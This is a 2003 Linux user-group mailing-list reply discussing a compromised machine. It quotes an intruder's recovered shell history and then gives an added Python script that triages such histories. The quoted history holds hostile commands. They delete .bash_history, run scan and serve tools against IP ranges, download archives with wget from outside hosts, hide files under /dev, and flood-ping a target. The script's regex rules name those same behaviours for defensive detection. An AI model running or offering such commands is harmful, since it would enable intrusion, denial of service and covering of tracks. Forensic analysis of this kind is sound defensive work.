On Thu, 2003-08-21 at 08:11, Brady Hegberg wrote:
> Looks like you've got Romanian script kiddies in your computer.  Well,
> they have stuff stashed on Romanian servers anyway.  I'm curious about
> this stuff myself.  I guess bot.tgz is a program that flood pings
> 203.144.243.10 (Asahi-Somboon ONLINE?)  What's bios.tgz?  And what are
> the scan and serv commands doing with those IP addresses?  Hmmm?

scan and serv were definitely something they installed on the machine.
bios.tgz & bot.tgz could be anything. They removed the history at least
once so who knows what else they did. They were idiots though. Why didn't
they remove the history when they were done? If they didn't crash his
system they could still be using it right now. They probably sniffed his
passwords. I think he was using ftp to access all his files from Windows
systems.


> > 
> > 
> > 
> > history
> > rm -rf .bash_history
> > ls -al
> > w
> > cd /tmp/.cfg/
> > cd samba
> > ./scan 217 139 97 1
> > ./scan 62 139 217 98
> > ./serv 67.160.4.66
> > ./scan 67 139 160 4
> > ./scan 217 139 0 1
> > ls -alF
> > cat /etc/issue
> > tar
> > cd /tmp
> > cd sh
> > ls -alF
> > tar -xzvf sh.tgz
> > exit
> > id
> > wget djcc.go.ro/bios.tgz
> > tar -xzvf bios.tgz
> > tar -xzvf bios.tgz
> > ls
> > rm -rf bios.tgz
> > ls
> > ps -aux
> > cat /proc/cpuinfo
> > exit
> > chmod 700 inst
> > chmod +x inst
> > exit
> > mkdir /dev/targa
> > cd /dev/targa
> > wget mihai-doini.org/bot.tgz
> > tar -xzvf bot.tgz
> > exit
> > ping -s -f 203.144.243.10 65500&
> > ping -f -s 203.144.243.10 65500&
> > ping -s -f 203.144.243.10 65500&
> > ls
> > cd /
> > ping -s -f 203.144.243.10 65500&
> > history | more
> > history | vim
> > history -w /tmp/hist.txt
> > 
> > 
> > 
> > _______________________________________________
> > TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> > http://www.mn-linux.org tclug-list at mn-linux.org
> > https://mailman.real-time.com/mailman/listinfo/tclug-list
-- 
Tom Penney <blots at visi.com>
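
An added example, not part of the original message or thread: a small triage pass over a shell history like the one quoted above. It tags the behaviours the thread points at (history removal, hidden staging directory, directory created under /dev, archive download, flood ping) and resolves where the ./scan and ./serv binaries lived so they can be collected. The rule names and the `triage` function are this example's own; the sample lines are an abridged excerpt of the quoted history.

```python
import posixpath
import re

# Rule names are this example's own; patterns mirror behaviours in the quoted history.
RULES = [
    ("history-tampering", re.compile(r"\brm\b.*\.bash_history")),
    ("hidden-staging-dir", re.compile(r"\bcd\s+/(?:tmp|var/tmp)/\.\S+")),
    ("mkdir-under-dev", re.compile(r"\bmkdir\s+/dev/\S+")),
    ("remote-archive-fetch", re.compile(r"\bwget\b.*\.(?:tgz|tar\.gz)\b")),
    ("flood-ping", re.compile(r"\bping\b.*\s-f\b")),
]

def triage(history_lines):
    """Return (findings, paths): tagged commands and resolved paths of ./binaries."""
    findings, paths, cwd = [], [], None
    for n, raw in enumerate(history_lines, 1):
        cmd = raw.strip()
        if not cmd:
            continue
        for tag, rx in RULES:
            if rx.search(cmd):
                findings.append((n, tag, cmd))
        words = cmd.split()
        if words[0] == "exit":
            cwd = None  # the history spans several sessions; cwd is unknown after exit
        elif words[0] == "cd" and len(words) > 1:
            if words[1].startswith("/"):
                cwd = posixpath.normpath(words[1])
            elif cwd is not None:
                cwd = posixpath.normpath(posixpath.join(cwd, words[1]))
        elif words[0].startswith("./"):
            # Binary run by relative path: record where it sat on disk, if known.
            paths.append(posixpath.join(cwd or "<unknown dir>", words[0][2:]))
    return findings, sorted(set(paths))

# Abridged excerpt of the history quoted in this thread, order preserved.
SAMPLE = """\
rm -rf .bash_history
cd /tmp/.cfg/
cd samba
./scan 217 139 97 1
./serv 67.160.4.66
exit
mkdir /dev/targa
wget mihai-doini.org/bot.tgz
ping -s -f 203.144.243.10 65500&
""".splitlines()

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

Because the history file merges several logins, the working directory is treated as unknown after each `exit`, so a path is reported only when the preceding `cd` commands actually establish it.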